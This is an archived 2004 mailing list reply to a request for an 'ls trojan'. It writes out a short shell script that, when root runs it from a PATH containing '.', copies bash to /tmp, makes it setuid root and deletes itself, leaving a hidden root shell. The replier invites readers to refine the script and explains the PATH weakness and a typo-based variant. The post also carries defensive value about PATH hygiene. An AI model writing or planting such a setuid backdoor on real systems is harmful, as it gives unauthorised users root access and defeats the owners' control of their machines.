mailing list archives
Re: Old LS Trojan?
From: Valdis.Kletnieks () vt edu
Date: Wed, 01 Dec 2004 17:03:43 -0500
On Wed, 01 Dec 2004 15:11:46 EST, "David S. Morgan" said:
I am looking for an old LS trojan, with trojan being a misnomer. Essentially
, the scinario is that the admin (root) has a . (dot) in his path.
Geez. I don't have it, but it's easy enough to write.
% cat > ./ls
/bin/cp /bin/bash /tmp/foobar
/bin/chmod 4755 /tmp/foobar
/bin/rm -f $0
% chmod +x ./ls
(Fix the shell magic and lack of > and 2> redirects yourself. Bonus points
for wrapping a check for $USER == root around the first 2 lines, and even
more for doing the *right* check ;)
And no, there's nothing in most "modern" unixoids that will "prevent" this
attack, other than not having '.' in the $PATH by default.
Incidentally, '.' at the front of $PATH is more dangerous for this, but I know
of at least one case where the sysadmin had '.' at the *end* and thought himself
safe - the attacker called it './sl' and waited for a typo (insider job, attacker
knew the admin was a poor typist ;)